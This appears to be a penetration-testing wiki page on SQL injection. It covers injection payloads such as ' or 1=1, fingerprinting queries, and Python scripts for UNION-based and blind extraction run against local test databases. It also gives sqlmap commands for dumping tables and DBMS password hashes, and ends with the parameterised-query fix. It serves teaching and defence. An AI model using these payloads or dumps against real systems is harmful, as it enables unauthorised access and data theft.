SQL Injection

Last updated 4 years ago

What is it?

Common SQL Verbs

Common SQL Statement verbs

  • SELECT - Retrieves data from a table

  • INSERT - Adds data to a table

  • DELETE - Removes rows from a table

  • UPDATE - Modifies data in a table

  • DROP - Deletes an entire table (or database)

  • UNION - Combines data from multiple queries

SQL Query Modifiers

  • WHERE

  • AND/OR

  • LIMIT #1, #2 - skip #1 rows and return at most #2 (MySQL syntax; the first argument is the offset)

  • ORDER BY # - sort by the #th column of the result set (useful for counting columns when their names are unknown)

Special Characters

  • ' and " - string delimiters

  • --, /* */, and # - comment delimiters (-- and # run to end of line, /* */ is a block comment; # is MySQL-only, and MySQL requires whitespace after --)

  • * and % - wildcards (* selects every column, % matches any string in a LIKE pattern)

  • ; - ends a SQL statement (stacked queries only work if the driver executes more than one statement per call)

  • = - equality comparison

Example

When testing for SQL injection, first send input that should break the query syntax (an unbalanced quote), then add characters that restore the normal result (a comment or a balanced quote), and only then inject verbs or modifiers, knowing they will be executed.

Sample server-side code (deliberately vulnerable: the request parameter is concatenated straight into the query text)

$sql = "
SELECT *
FROM Users
WHERE lname='{$_GET['name']}';
";

Normal input: Defender
URL: http://test.com/sqli.php?name=Defender
SQL Query: SELECT * FROM Users WHERE lname='Defender';
Results: Normal result

Injected input: Defender'
URL: http://test.com/sqli.php?name=Defender'
SQL Query: SELECT * FROM Users WHERE lname='Defender'';
Results: The unbalanced ' leaves the string literal open, so the query fails with a syntax error

Injected input: Defender'; --
URL: http://test.com/sqli.php?name=Defender';%20--%20
SQL Query: SELECT * FROM Users WHERE lname='Defender'; --';
Results: Normal result, because the comment swallows the original closing quote. On MySQL the -- comment needs a trailing space, so URL-encode it (%20 or +) or use # instead

Injected input: Defender' or 1=1; --
URL: http://test.com/sqli.php?name=Defender'%20or%201=1;%20--%20
SQL Query: SELECT * FROM Users WHERE lname='Defender' or 1=1; --';
Results: 1=1 is always true, so every row in the Users table is returned

Balancing a payload

Quote balancing

If the comment approach does not work (the comment characters are filtered, or the injection point sits in the middle of a statement), balance the quote with a string comparison instead. Example injection: Defender' OR 'a'='a. Resulting statement: SELECT ... WHERE lname='Defender' OR 'a'='a';

Column numbers balancing

A UNION SELECT must return the same number of columns as the original SELECT, and an INSERT must supply one value per column it names, so the column count has to be discovered first (ORDER BY n fails once n exceeds the column count; UNION SELECT NULL,NULL,... fails until the counts match).

Data type balancing

In a UNION the data types of corresponding columns must be compatible (MySQL coerces loosely, MSSQL and Oracle error out), and INSERT values must match their columns' types. NULL is compatible with every type, so use it as filler and put the payload only in a column of the right type.

Exploiting

DB Fingerprinting

# Special functions/parameters
## MySQL or SQL Server:
SELECT @@version
## Oracle:
SELECT banner FROM v$version

# String concatenation (each evaluates to 'Test')
MySQL: 'Te' 'st'        -- adjacent literals are joined; CONCAT('Te','st') also works
MSSQL: 'Te'+'st'
Oracle: 'Te'||'st'

# Unique numeric functions (exist on only one DBMS, so the error/no-error tells you which one it is)
MySQL: connection_id()
MSSQL: @@pack_received
Oracle: BITAND(1,1)

In-band SQL injection
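The following is an added example (not code from the original page): a Python script that runs the column-count balancing from the Balancing section and then a UNION-based in-band extraction against an in-memory SQLite database. The schema and rows are constructed for the example, the concatenating `vulnerable_query` mirrors the PHP sample, and `sqlite_master` stands in for `information_schema.tables` on MySQL/MSSQL. A SQL error is treated as the attacker would see it: a page that fails to render.

```python
import sqlite3


# Constructed sample schema (not from the page): the Users table the PHP
# sample queries, plus a second table holding the data the attacker wants.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, lname TEXT, email TEXT)")
    conn.execute("CREATE TABLE Secrets (id INTEGER, token TEXT)")
    conn.execute("INSERT INTO Users VALUES (1, 'Defender', 'defender@example.com')")
    conn.execute("INSERT INTO Secrets VALUES (1, 'tok-3f9a')")
    return conn


def vulnerable_query(conn, name):
    """Concatenating endpoint, as in the page's PHP sample. Returns the rows,
    or None when the DBMS raised an error (the HTTP-side equivalent of a 500)."""
    try:
        return conn.execute(f"SELECT * FROM Users WHERE lname='{name}'").fetchall()
    except sqlite3.OperationalError:
        return None


def count_columns_order_by(conn, max_cols=16):
    """ORDER BY n succeeds while n <= number of columns and errors beyond it."""
    for n in range(1, max_cols + 1):
        if vulnerable_query(conn, f"Defender' ORDER BY {n} -- ") is None:
            return n - 1
    return None


def count_columns_union(conn, max_cols=16):
    """UNION SELECT NULL, NULL, ... only parses once the column counts match.
    NULL is the filler because it is compatible with every column type, which
    is the data-type balancing the page describes."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        if vulnerable_query(conn, f"x' UNION SELECT {nulls} -- ") is not None:
            return n
    return None


def union_extract(conn, ncols, expr, source):
    """In-band extraction: place `expr` in the text-typed lname slot (column 2)
    and pad the other slots with NULL so the UNION balances. 'x' matches no
    real row, so only the attacker-controlled rows come back in the response."""
    slots = ["NULL"] * ncols
    slots[1] = expr
    payload = f"x' UNION SELECT {', '.join(slots)} FROM {source} -- "
    rows = vulnerable_query(conn, payload)
    return sorted(row[1] for row in rows)


def list_tables(conn, ncols):
    # sqlite_master stands in for information_schema.tables on MySQL/MSSQL
    return union_extract(conn, ncols, "name", "sqlite_master WHERE type='table'")


if __name__ == "__main__":
    conn = make_db()
    ncols = count_columns_order_by(conn)
    print("columns:", ncols, count_columns_union(conn))               # 3 3
    print("tables:", list_tables(conn, ncols))                         # ['Secrets', 'Users']
    print("tokens:", union_extract(conn, ncols, "token", "Secrets"))   # ['tok-3f9a']
```

Both counting methods agree on three columns; the UNION then pulls table names and the token out through the lname column, which is exactly the slot the application already renders on the page.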

Blind SQL injection

Test by injecting a delay and comparing response times: send test' {sleep 10} and then test' {sleep 20} (for example SLEEP(10) on MySQL, WAITFOR DELAY '0:0:10' on MSSQL, pg_sleep(10) on PostgreSQL) and check whether the server takes correspondingly longer to respond. Using two different delays rules out a coincidentally slow response.
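The following is an added example (not code from the original page) of the inference logic behind blind injection. It uses a boolean oracle rather than a timing one, since SQLite has no sleep function, but the loop is identical for the time-based case: replace the "did a row come back" check with "did the response take longer than the injected delay". The Users table and the password `s3cr3t!` are constructed for the example; `unicode(substr(...))` is SQLite's equivalent of MySQL's `ASCII(SUBSTRING(...))`.

```python
import sqlite3

# Constructed sample data (not from the page): one user whose password column
# the attacker recovers one character at a time through a true/false oracle.
SECRET = "s3cr3t!"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (lname TEXT, password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('Defender', ?)", (SECRET,))
    return conn


class BlindClient:
    """Models what the attacker can observe: only whether the vulnerable lookup
    returned a row (normal page) or not (empty page). No database value is
    ever displayed directly."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def page_shows_result(self, name):
        self.requests += 1
        try:
            rows = self.conn.execute(f"SELECT * FROM Users WHERE lname='{name}'").fetchall()
        except sqlite3.OperationalError:
            return False
        return len(rows) > 0

    def ask(self, condition):
        """Append one boolean condition to a known-good lname; the trailing
        comment neutralises the query's original closing quote."""
        return self.page_shows_result(f"Defender' AND ({condition}) -- ")

    def find_value(self, expr, lo, hi):
        """Binary search for the smallest v in [lo, hi] with expr <= v, so about
        log2(hi - lo) requests per value instead of one request per candidate."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract_password(self, max_len=64):
        length = self.find_value("length(password)", 0, max_len)
        chars = []
        for i in range(1, length + 1):
            # unicode(substr(...)) yields the code point of the i-th character;
            # 32..126 covers printable ASCII (MySQL: ASCII(SUBSTRING(password, i, 1)))
            code = self.find_value(f"unicode(substr(password, {i}, 1))", 32, 126)
            chars.append(chr(code))
        return "".join(chars)


if __name__ == "__main__":
    client = BlindClient(make_db())
    print(client.extract_password())                 # s3cr3t!
    print("requests used:", client.requests)
```

Seven characters cost well under a hundred requests thanks to the binary search; a naive one-request-per-candidate loop would need roughly 94 per character, which is why tools batch and parallelise blind extraction.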

Cheat Sheet

Display the full SQL statement currently executing (MySQL), which reveals exactly where your input lands in the query:

SELECT info FROM information_schema.processlist

Tools

SQLMAP

Open-source, Python-based command-line SQL injection tool created by Bernardo Damele A. G. (@inquisb) and maintained with Miroslav Stampar (@stamparm).

See sqlmap extended help

sqlmap -hh

Test for vulnerability (-r replays a saved raw HTTP request, e.g. exported from Burp, so cookies and headers are preserved)

sqlmap -r sqli.txt.raw 

Lists Database

sqlmap -r sqli.txt.raw  --dbs

With found database, lets list the tables

sqlmap -r sqli.txt.raw -D Logins --tables

With found tables, list all columns

sqlmap -r sqli.txt.raw -D Logins -T usernames --columns

Dump all records on a table

sqlmap -r sqli.txt.raw -D Logins -T usernames --dump

Search all columns for a string (Example "pass")

sqlmap -r sqli.txt.raw --search -C pass

Per found table and columns, dump information of query

On a pentest you usually do not want to dump sensitive tables wholesale, since sqlmap caches everything it retrieves in its output directory on your machine. Instead of a plain --dump, use --count to see how many rows there are, then pull a small sample with --dump --start=1 --stop=3.

sqlmap -r sqli.txt.raw -D secretdb -T password --dump

Alternatively, dump only the 38th row (--start/--stop are 1-based row positions; use --where="<condition>" to filter by a SQL condition instead)

sqlmap -r sqli.txt.raw -D secretdb -T password --dump --start=38 --stop=38

Enumerate the DBMS users and their password hashes (the accounts used to administer the database, not the application's users)

sqlmap -r sqli.txt.raw --users --passwords

SQL Injection Defenses
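A runnable version of the walk-through from the Example section and of the defence this heading refers to, added here as an example (not code from the original page). Python with an in-memory SQLite database stands in for the PHP/MySQL sample, and the Users rows are constructed. `lookup_vulnerable` concatenates the parameter exactly like the PHP sample; `lookup_safe` is the parameterised fix, where the query shape and the value travel separately so the value can never be parsed as SQL. The five inputs from the Example section are run through both.

```python
import sqlite3

# Constructed sample rows (not from the page), matching the Users table the
# PHP sample queries by lname.
USERS = [
    (1, "Defender", "defender@example.com"),
    (2, "Smith", "smith@example.com"),
    (3, "Jones", "jones@example.com"),
]


def make_db():
    """In-memory SQLite database standing in for the page's Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, lname TEXT, email TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, name):
    """Same pattern as the PHP sample: the parameter is spliced into the SQL
    text, so quotes in it change the structure of the statement."""
    sql = f"SELECT * FROM Users WHERE lname='{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Parameterised query: the DBMS receives the statement and the value
    separately, so a quote in the value is just a character in a string."""
    return conn.execute("SELECT * FROM Users WHERE lname=?", (name,)).fetchall()


def probe(name):
    """Run one input through both versions; returns (vulnerable rows, safe rows)."""
    conn = make_db()
    return len(lookup_vulnerable(conn, name)), len(lookup_safe(conn, name))


def has_syntax_error(name):
    """True if the input breaks the concatenated query outright."""
    conn = make_db()
    try:
        lookup_vulnerable(conn, name)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    print(probe("Defender"))               # (1, 1)  normal result either way
    print(has_syntax_error("Defender'"))   # True    the stray quote breaks the query
    print(probe("Defender'; --"))          # (1, 0)  comment swallows the trailing quote
    print(probe("Defender' or 1=1; --"))   # (3, 0)  whole table through the vulnerable path
    print(probe("Defender' OR 'a'='a"))    # (3, 0)  quote-balanced variant, no comment needed
```

The parameterised path returns zero rows for every injected string because it looks for a last name that literally contains the quote and the payload. The same holds for prepared statements in PHP (PDO with bound parameters) and every other driver: the fix is structural, not a blacklist of characters.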

Resources

  • HUGE SQL injection cheat sheet: https://www.websec.ca/kb/sql_injection

  • NetSPI SQL injection wiki: https://sqlwiki.netspi.com/

  • Time-based Blind SQL Injection: https://www.sqlinjection.net/time-based/

  • OWASP Blind SQL injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection

  • NoSQL injections: https://medium.com/bugbountywriteup/nosql-injection-8732c2140576

  • swisskyrepo's guide to NoSQL Injections: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

  • Understanding GraphQL Schemas and Types: https://graphql.org/learn/schema/

  • byt3bl33d3r's MSSQL command reference (CrackMapExec wiki): https://github.com/byt3bl33d3r/CrackMapExec/wiki/MSSQL-Command-Reference

  • Video: https://www.youtube.com/watch?v=azYwfI26oXo